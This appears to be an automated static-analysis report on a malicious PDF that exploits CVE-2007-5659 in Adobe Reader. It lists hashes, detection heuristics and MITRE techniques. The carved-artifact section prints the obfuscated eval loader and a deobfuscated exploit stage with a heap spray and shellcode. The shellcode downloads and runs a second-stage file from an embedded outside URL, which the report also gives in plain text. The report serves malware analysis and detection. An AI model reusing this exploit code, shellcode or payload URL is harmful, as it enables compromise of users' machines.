Malicious PDF — malware analysis report

Static analysis result for SHA-256 7bb1947897d8188c…

MALICIOUS

PDF

17.6 KB
MD5: 813578d0c649438a615a7cd0b5338dda SHA-1: 2f769fc30c8dad1053bbe33f2eb1d14560fba38d SHA-256: 7bb1947897d8188cde5931c6c0f25f05de85c27891bb32d37e4bf835b62a2ff1
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF sample contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a dropper, utilizing String.fromCharCode for decoding and checking app.plugIns.length for anti-analysis. It ultimately downloads a second-stage payload from the embedded URL http://sosiskaptk.info/page/gold.php/n002102807r0007J0c000601R43329fdcXd351c909Y7530e03dZ03f01930.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sosiskaptk.info/page/gold.php/n002102807r0007J0c000601R43329fdcXd351c909Y7530e03dZ03f01930 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x43F6 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
8c5aecf59bf78d8665cce80ba63be5f0aa3effb1488b4be41a329e6ebcf41da3		 deobfuscated-js z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1B07 5371 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var I8__Ltk_8U = new Array();var ub_5s00O8mxP_y = 0;var Nq_3_XlO = "";function jc2fLA_1GA_peUH(Mn_F_ohM1f3b, T2pO2x__3bpX7){var W_aI_38tqUSg_3R = T2pO2x__3bpX7.toString();var k2O_DuD26d0 = "";for(var X5SQ8W__cWt = 0; X5SQ8W__cWt < W_aI_38tqUSg_3R.length; X5SQ8W__cWt++) {var do_63p103__I8 = parseInt(W_aI_38tqUSg_3R.substr(X5SQ8W__cWt, 1));if (!isNaN(do_63p103__I8)) {do_63p103__I8 = do_63p103__I8.toString(16);if (do_63p103__I8.length == 1) { do_63p103__I8 = "0" + do_63p103__I8; }else if (do_63p103__I8.length != 2) { do_63p103__I8 = "00"; }k2O_DuD26d0 = do_63p103__I8 + k2O_DuD26d0;if (k2O_DuD26d0.length == 8) {break;}}}while(k2O_DuD26d0.length < 8) { k2O_DuD26d0 = "0" + k2O_DuD26d0; }var Dq8_B2Hm = Mn_F_ohM1f3b.toString(16);if (Dq8_B2Hm.length == 1) { Dq8_B2Hm = "0" + Dq8_B2Hm; }else if (Dq8_B2Hm.length != 2) { Dq8_B2Hm = "00"; }k2O_DuD26d0 = "3" + Dq8_B2Hm + "P" + k2O_DuD26d0;return k2O_DuD26d0;}function j__ds8GSm(d_62YT, rrj432T){var G_m0F0_S_3_4N = new Array("");var rRWjR_cFruwl_Il = d_62YT;var DD41_63c_4;if ((DD41_63c_4 = d_62YT.lastIndexOf("%u00")) != -1) {if (DD41_63c_4 + 6 == d_62YT.length) {G_m0F0_S_3_4N[0] = d_62YT.substr(DD41_63c_4 + 4, 2);rRWjR_cFruwl_Il = d_62YT.substring(0, DD41_63c_4);}}DD41_63c_4 = 1;for (X5SQ8W__cWt = 0; X5SQ8W__cWt < rrj432T.length; X5SQ8W__cWt++) {var uoHw572C_i1_its = rrj432T.charCodeAt(X5SQ8W__cWt).toString(16);if (uoHw572C_i1_its.length == 1) { uoHw572C_i1_its = "0" + uoHw572C_i1_its; }G_m0F0_S_3_4N[DD41_63c_4] = uoHw572C_i1_its;DD41_63c_4++;}X5SQ8W__cWt = G_m0F0_S_3_4N[0].length ? 0 : 1;G_m0F0_S_3_4N[DD41_63c_4] = "00";G_m0F0_S_3_4N[DD41_63c_4 + 1] = "00";DD41_63c_4 += 2;if ((G_m0F0_S_3_4N.length - X5SQ8W__cWt) % 2) {G_m0F0_S_3_4N[DD41_63c_4] = "00";}while(X5SQ8W__cWt < G_m0F0_S_3_4N.length) {rRWjR_cFruwl_Il += "%u" + G_m0F0_S_3_4N[X5SQ8W__cWt + 1] + G_m0F0_S_3_4N[X5SQ8W__cWt];X5SQ8W__cWt += 2;}rRWjR_cFruwl_Il += "%u0000";return rRWjR_cFruwl_Il;}function I4a__g5_j(r__WlUTGo6mEA, rx6kU_dBvm){while (r__WlUTGo6mEA.length*2<rx6kU_dBvm) {r__WlUTGo6mEA += r__WlUTGo6mEA;}r__WlUTGo6mEA = r__WlUTGo6mEA.substring(0,rx6kU_dBvm/2);return r__WlUTGo6mEA;}function W_dq34242D_6g(mWPXk0xy, y450h_Rv31_2_k, tX_qe3jE7cr){var E___n___Y_Cj = 0x0c0c0c0c;var r__WlUTGo6mEA = unescape(y450h_Rv31_2_k);var rrj432T = jc2fLA_1GA_peUH(mWPXk0xy, tX_qe3jE7cr);var Y_C_7k5 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var d_62YT = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4570%u4b70%u5266%u6a61%u0043%u7468%u7074%u2f3a%u732f%u736f%u7369%u616b%u7470%u2e6b%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3132%u3230%u3038%u7237%u3030%u3730%u304a%u3063%u3030%u3036%u5231%u3334%u3233%u6639%u6364%u6458%u3533%u6331%u3039%u5939%u3537%u3033%u3065%u6433%u305a%u6633%u3130%u3339%u0030";app.iS_616c = unescape(j__ds8GSm(d_62YT, rrj432T));var qBsg_6k_1 = 0x400000;var XIT__np___PP1 = Y_C_7k5.length * 2;var rx6kU_dBvm = qBsg_6k_1 - (XIT__np___PP1+0x38);r__WlUTGo6mEA = I4a__g5_j(r__WlUTGo6mEA, rx6kU_dBvm);var LVp_ttCj_08fkp = (E___n___Y_Cj - 0x400000)/qBsg_6k_1;for (var RE_TXW_FD = 0; RE_TXW_FD < LVp_ttCj_08fkp; RE_TXW_F
... (truncated)
deobfuscated.js
6fa32d8b583fbb0efd7c1bf4e16c2c2bd16e802e3fc7d5c6348d79e8c776512b		 deobfuscated-js PDF JavaScript deobfuscation pass 124269 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
373h1d7fbi6j7c22046k9e59b100aebg262h6700b17428bibaaebh16838f4d8fbh0364467i730g461ab63e5g2e1gbi6h6fc31b7a7j6c28ab375630116hbc53b288a8937820587j9f608i662h4b617d7c5i7d061227593i3i6jai9j425kb71j6e2k245d7e1a4d6fac7b0h95ad9jad59b34b7c759b7k3a1d74b1605g23ak335936878563ai9i2c754a328229399a8ha0256fad97407d13bb10a5180jaj7da18f6a0484bc9gbj4b864a2e4c9e083i1e7d629d5kc3874h2da0008c41620e9b6a1d152c191d201hbj8a850ga18b7hb1951a765a4g715005bfb90288610598948h434g2d585e876i1a000125421k1b1660bd1b7ibb43324f8jb7b249b5387475731b599826ba584b107cbj4j6d2h5k1458bk525g4c93564b28429093bf6iai69673a8fb99f3h280h838ba0639fa21607827e3456ae447a8hb40j9hb82g7f4cah734e449f3139297i11897f1ibd3004925h8456638076ab7656ae67767k3k0h6j6b802kc3aaa43dbh7k57515642a73b14157d3hc018c3af1e1e9k5h659792a8ae062j302aac0f8gah3a585kb45k92aab1452a1k4f946k592c90b12e990g0b47a4af1j1k38b64286aea20g4925711k8h1128aj498fa1446454akae551c194765716c4b9j966f9k1k2h727c1b39bg3ebb0i947fa3346g048i3g9c3k5h632b709j69b82ebjb99f72861eac4c737bc26a741a515d8562193h177k5c09ad91298d1ba5a34k985g6d313e767ga90a2a35307478bf8992657b9i524k50c12j77b70g1g5216c198950cc318c12g59855bb0889i0g72b8bd9h4d0g171b7jc31k76ab625j9b9k2886255a1g37ag3g7h2jbc0799bca642bb6b569k720dbj0c1f5e910j2baea55c4k7i103c31bc7665470c33a832841e96c1849a69453f720h212538ab1f135b0d2c60936d0c195d188c6126a1266c14babk72651bb8b32a9b4g8k68816i3i4h371d25bb2547ag16b46h3d5ja17h7iak25572b2682730a8i8e04449bak6k4g8g0e1b7f5f166g8i8e7f9ia0183737409d2abd2k7g5aag0b7bb9b10e864j168473a98019012bc3a98i9185aj5jaac25g4ga77d6ka39h9k400g86936g9418923ka82454920d0fa08aa05g52b6c06h7559bbab081i3cb67ab72a9c1g7kbi9gb9158c8a2e7h15934k4k7b6h36752d1k391c09037d7e5gc352645b77bh172g261j3h3ha61b8k939g958c1j8b836b4b8e40382a348e76396gabb40i3733205i7i7h4e4c053358132i3h549j166i9i44096219aga87c9167893j7c8437bk76be8j981fac0152437k854g0g8c2b733f006i4938abbdah658h24ac33771j1a01b4bf1ia47a7gai8h9956bi858c118a505h52969735a8bk6dbi7d938a3g4c9j0g62668b26a9982a23b9b59j57100g4c9h200g949fa66fag4f3c65638jb1390i19bj5g25a38ebc5c5j3554507k6i1b000e25210i152i63bf0g95922a1h4g771a8b21af304352974i2g8g05ai5k2ib07c9g345h56680g6g7d455e1fa04g35016eb4962f811a6e6d5f9h2c8f3jb01g50576h4d69620kb65254212f9g786k868eb183a22h636j7j404f356eb73cbk7jah7a7kb9bi30a5774ba25k8kaiac097h58b25kbc6730264c63882fahaaa15f8k97784j54129g28403h8e07ba029h194h100j91956f7ha3aa124b4103a00f8e9j044c63ai2k6k8kb47a0i0h5h7c61530e9b2b60c037144a6ic21b1k2d973ja2979k3k7c288040bc3i2ab012626d0g7j5babba79242734954g352h120d4dai232f725d0a5a2c35bb238989b960ab0i5213b441497e2j8f9j69094329b96e3h59b476754e6d25756c0f517g9k660d48098i6a20a996bi7haeaa99550c9f8e472h9b8g8b2h082230939eabbd8i5i4k6i7a7j82282jb6231j5h4h288a7ab81h9k2eba518b743ea50204464h8b9ab548033k3iajah2f8c0a7e989j912b8a1c4j074d0f5j7463af9fa233034b287g60bd39bjc2c3bk88bf9abhb0ad3a5e8i0f314f15a771300j35b10e853e8cb07g8g30231a3h15b2185a7b410i5f3j2b3i957dc31d2f10816d658f3e590i017f72340e10bj2e9d4194646a92774567505a343b3h30bg138518606g92990fc27c244a6a4gb65j9a1a1896b3874i9g942j679g2j4ka07i5h6k8525600h629k5hbc0a71347ha16h92bc31a5590b55522ea60fah3fa6b9b0a37g0e66749g282d9jb667acacc3603g4ic3607b316i55a43j4h0d2d4f137fb85g57b6bb2k6j3fbg0a23b342c161aa1i6b1a8jac950k2c7h594b5i0bba61259g34183bbbaj0g1e1e0dadaa621g1b94656abc17223d2h1i5b9i27bi999j03a62i42525e328c260f0g29884h2g81ai0f1f35613165b1921g399k2j4b020a76809j1c4kbd743c6ibiaeb370a7349f408f5d641g72bg8j8ga07a014446837c44bb9i4e9632356000066a8g81259e069i6h4c0fb9c09e180jag4g9ca97ba2589k8g911k7g423571889i0ga188368i5018ag44480c255f5k721fbi7b432k250i075d9ja34ca2120b6i76ae9d0j7634534074bf331g2bbg782e786ic05943255f5977a11k3j1a384d300a404i83b5579410433j6bb47a30ab3e3k5d6d4b54b80gc354420h759f4f4k39813g88ah3d6e0e9e211c26318d570c9219445326ac1eb74f1cai6978985489892107827c494j1c5k4g7d9e0j8g9b4a876ja15f5b05650b310d8331a08k1ic328009e3dbb979ab49ib4791kb477754c052e4c52880a8a8g0i60c0b48a7i2650ag504634ad2eac1b101d480ib28e6dag9906113a5b6a30ab9j9eai2g7c841a3k92c1a67a1a144j8h5c490f98bf5ba31jc00iag2f2c2623b66690ak0g097i387a3ab63eak804d8791389h67c1078424521g7h4a694h08bg6j081e2g598a3g37334h2740a1bf1d326g16903gbb5e5d7i457kae4a0j3600b95h544e1da67c667h298c5h1a3285923i1j7a477k5c120jaj16741c7j9h36ak
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.